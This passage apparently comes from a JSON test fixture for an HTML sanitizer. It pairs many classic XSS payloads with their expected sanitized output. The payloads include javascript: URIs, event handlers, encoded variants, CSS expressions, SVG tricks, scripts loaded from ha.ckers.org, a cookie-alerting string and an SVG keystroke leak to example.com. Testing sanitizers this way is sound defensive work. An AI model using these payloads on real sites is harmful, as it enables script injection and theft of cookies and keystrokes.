   485     "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>",
   486     "sanitized": "<html><head></head><body>\n\n&lt;svg:svg&gt;\n&lt;svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\"&gt;\n\t&lt;svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/&gt;\n\t&lt;svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/&gt;\n&lt;/svg:mask&gt;\n&lt;/svg:svg&gt;\n&lt;/body&gt;\n&lt;/html&gt;</body></html>"
   487   },
   488   {
   489     "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>",
   490     "sanitized": "<html><head></head><body></body></html>"
   491   },
   492   {
   493     "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>",
   494     "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>"
   495   },
   496   {
   497     "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0",
   498     "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>"
   499   },
   500   {
   501     "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n  id    ID    #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n    <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n        <xsl:template match=\"/\">\r\n            <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n        </xsl:template>\r\n    </xsl:stylesheet>\r\n    <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>",
   502     "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]&gt;\n\n    \n        \n            \n        \n    \n    \n</body></html>"
   503   },
   504   {
   505     "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>",
   506     "sanitized": "<html><head></head><body>\n</body></html>"
   507   },
   508   {
   509     "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>",
   510     "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>"
   511   },
   512   {
   513     "data": "<svg><style>&lt;img/src=x onerror=alert(1)// </b>",
   514     "sanitized": "<html><head></head><body></body></html>"
   515   },
   516   {
   517     "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>",
   518     "sanitized": "<html><head></head><body>\n\n\n</body></html>"
   519   },
   520   {
   521     "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>",
   522     "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>"
   523   },
   524   {
   525     "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>",
   526     "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,&lt;script&gt;alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&lt;/script&gt;&lt;b&gt;\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>"
   527   },
   528   {
   529     "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>",
   530     "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>"
   531   },
   532   {
   533     "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>",
   534     "sanitized": "<html><head></head><body></body></html>"
   535   },
   536   {
   537     "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>",
   538     "sanitized": "<html><head></head><body>\n&lt;%\n\n<img alt=\"%&gt;&lt;/xmp&gt;&lt;img src=xx:x onerror=alert(1)//\">\n\n %&gt;/\nalert(2)\n\n\nXXX\n\n--&gt;{}\n*{color:red}</body></html>"
   539   },
   540   {
   541     "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval>\r\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>",
   542     "sanitized": "<html><head></head><body>\n\n</body></html>"
   543   },
   544   {
   545     "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>",
   546     "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>"
   547   },
   548   {
   549     "data": "<SCRIPT>alert('XSS');</SCRIPT>",
   550     "sanitized": "<html><head></head><body></body></html>"
   551   },
   552   {
   553     "data": "'';!--\"<XSS>=&{()}",
   554     "sanitized": "<html><head></head><body>'';!--\"=&amp;{()}</body></html>"
   555   },
   556   {
   557     "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
   558     "sanitized": "<html><head></head><body></body></html>"
   559   },
   560   {
   561     "data": "<IMG SRC=\"javascript:alert('XSS');\">",
   562     "sanitized": "<html><head></head><body><img></body></html>"
   563   },
   564   {
   565     "data": "<IMG SRC=javascript:alert('XSS')>",
   566     "sanitized": "<html><head></head><body><img></body></html>"
   567   },
   568   {
   569     "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>",
   570     "sanitized": "<html><head></head><body><img></body></html>"
   571   },
   572   {
   573     "data": "<IMG SRC=javascript:alert(&quot;XSS&quot;)>",
   574     "sanitized": "<html><head></head><body><img></body></html>"
   575   },
   576   {
   577     "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
   578     "sanitized": "<html><head></head><body><img></body></html>"
   579   },
   580   {
   581     "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
   582     "sanitized": "<html><head></head><body><img></body></html>"
   583   },
   584   {
   585     "data": "SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
   586     "sanitized": "<html><head></head><body>SRC=\n<img></body></html>"
   587   },
   588   {
   589     "data": "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
   590     "sanitized": "<html><head></head><body><img></body></html>"
   591   },
   592   {
   593     "data": "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
   594     "sanitized": "<html><head></head><body><img></body></html>"
   595   },
   596   {
   597     "data": "<IMG SRC=\"javascript:alert('XSS');\">",
   598     "sanitized": "<html><head></head><body><img></body></html>"
   599   },
   600   {
   601     "data": "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">",
   602     "sanitized": "<html><head></head><body><img></body></html>"
   603   },
   604   {
   605     "data": "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
   606     "sanitized": "<html><head></head><body><img></body></html>"
   607   },
   608   {
   609     "data": "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">",
   610     "sanitized": "<html><head></head><body><img></body></html>"
   611   },
   612   {
   613     "data": "<IMG SRC=\" &#14;  javascript:alert('XSS');\">",
   614     "sanitized": "<html><head></head><body><img></body></html>"
   615   },
   616   {
   617     "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
   618     "sanitized": "<html><head></head><body></body></html>"
   619   },
   620   {
   621     "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
   622     "sanitized": "<html><head></head><body></body></html>"
   623   },
   624   {
   625     "data": "<IMG SRC=\"javascript:alert('XSS')\"",
   626     "sanitized": "<html><head></head><body></body></html>"
   627   },
   628   {
   629     "data": "<SCRIPT>a=/XSS/",
   630     "sanitized": "<html><head></head><body></body></html>"
   631   },
   632   {
   633     "data": "\\\";alert('XSS');//",
   634     "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>"
   635   },
   636   {
   637     "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
   638     "sanitized": "<html><head></head><body></body></html>"
   639   },
   640   {
   641     "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
   642     "sanitized": "<html><head></head><body></body></html>"
   643   },
   644   {
   645     "data": "<BODY ONLOAD=alert('XSS')>",
   646     "sanitized": "<html><head></head><body></body></html>"
   647   },
   648   {
   649     "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">",
   650     "sanitized": "<html><head></head><body><img></body></html>"
   651   },
   652   {
   653     "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">",
   654     "sanitized": "<html><head></head><body><img></body></html>"
   655   },
   656   {
   657     "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">",
   658     "sanitized": "<html><head></head><body></body></html>"
   659   },
   660   {
   661     "data": "<BR SIZE=\"&{alert('XSS')}\">",
   662     "sanitized": "<html><head></head><body><br></body></html>"
   663   },
   664   {
   665     "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>",
   666     "sanitized": "<html><head></head><body></body></html>"
   667   },
   668   {
   669     "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
   670     "sanitized": "<html><head></head><body></body></html>"
   671   },
   672   {
   673     "data": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
   674     "sanitized": "<html><head></head><body></body></html>"
   675   },
   676   {
   677     "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
   678     "sanitized": "<html><head></head><body></body></html>"
   679   },
   680   {
   681     "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
   682     "sanitized": "<html><head></head><body></body></html>"
   683   },
   684   {
   685     "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
   686     "sanitized": "<html><head></head><body></body></html>"
   687   },
   688   {
   689     "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
   690     "sanitized": "<html><head></head><body><img></body></html>"
   691   },
   692   {
   693     "data": "<IMG SRC=\"mocha:[code]\">",
   694     "sanitized": "<html><head></head><body><img></body></html>"
   695   },
   696   {
   697     "data": "<IMG SRC=\"livescript:[code]\">",
   698     "sanitized": "<html><head></head><body><img></body></html>"
   699   },
   700   {
   701     "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
   702     "sanitized": "<html><head></head><body></body></html>"
   703   },
   704   {
   705     "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
   706     "sanitized": "<html><head></head><body></body></html>"
   707   },
   708   {
   709     "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">",
   710     "sanitized": "<html><head></head><body></body></html>"
   711   },
   712   {
   713     "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
   714     "sanitized": "<html><head></head><body></body></html>"
   715   },
   716   {
   717     "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
   718     "sanitized": "<html><head></head><body></body></html>"
   719   },
   720   {
   721     "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
   722     "sanitized": "<html><head></head></html>"
   723   },
   724   {
   725     "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
   726     "sanitized": "<html><head></head><body><table></table></body></html>"
   727   },
   728   {
   729     "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
   730     "sanitized": "<html><head></head><body><div></div></body></html>"
   731   },
   732   {
   733     "data": "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">",
   734     "sanitized": "<html><head></head><body><div></div></body></html>"
   735   },
   736   {
   737     "data": "<DIV STYLE=\"width: expression(alert('XSS'));\">",
   738     "sanitized": "<html><head></head><body><div></div></body></html>"
   739   },
   740   {
   741     "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
   742     "sanitized": "<html><head></head><body></body></html>"
   743   },
   744   {
   745     "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
   746     "sanitized": "<html><head></head><body><img></body></html>"
   747   },
   748   {
   749     "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
   750     "sanitized": "<html><head></head><body></body></html>"
   751   },
   752   {
   753     "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");",
   754     "sanitized": "<html><head></head><body>exp/*</body></html>"
   755   },
   756   {
   757     "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
   758     "sanitized": "<html><head></head><body></body></html>"
   759   },
   760   {
   761     "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
   762     "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>"
   763   },
   764   {
   765     "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
   766     "sanitized": "<html><head></head><body></body></html>"
   767   },
   768   {
   769     "data": "<BASE HREF=\"javascript:alert('XSS');//\">",
   770     "sanitized": "<html><head></head><body></body></html>"
   771   },
   772   {
   773     "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
   774     "sanitized": "<html><head></head><body></body></html>"
   775   },
   776   {
   777     "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>",
   778     "sanitized": "<html><head></head><body></body></html>"
   779   },
   780   {
   781     "data": "getURL(\"javascript:alert('XSS')\")",
   782     "sanitized": "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>"
   783   },
   784   {
   785     "data": "a=\"get\";",
   786     "sanitized": "<html><head></head><body>a=\"get\";</body></html>"
   787   },
   788   {
   789     "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">",
   790     "sanitized": "<html><head></head><body></body></html>"
   791   },
   792   {
   793     "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>",
   794     "sanitized": "<html><head></head><body></body></html>"
   795   },
   796   {
   797     "data": "<HTML><BODY>",
   798     "sanitized": "<html><head></head><body></body></html>"
   799   },
   800   {
   801     "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
   802     "sanitized": "<html><head></head><body></body></html>"
   803   },
   804   {
   805     "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
   806     "sanitized": "<html><head></head><body></body></html>"
   807   },
   808   {
   809     "data": "<? echo('<SCR)';",
   810     "sanitized": "<html><head></head><body></body></html>"
   811   },
   812   {
   813     "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">",
   814     "sanitized": "<html><head></head><body></body></html>"
   815   },
   816   {
   817     "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
   818     "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>"
   819   },
   820   {
   821     "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
   822     "sanitized": "<html><head></head><body></body></html>"
   823   },
   824   {
   825     "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
   826     "sanitized": "<html><head></head><body></body></html>"
   827   },
   828   {
   829     "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
   830     "sanitized": "<html><head></head><body></body></html>"
   831   },
   832   {
   833     "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
   834     "sanitized": "<html><head></head><body></body></html>"
   835   },
   836   {
   837     "data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC",
   838     "sanitized": "<html><head></head><body>PT SRC</body></html>"
   839   },
   840   {
   841     "data": "",
   842     "sanitized": "<html><head></head><body></body></html>"
   843   }
   844 ]
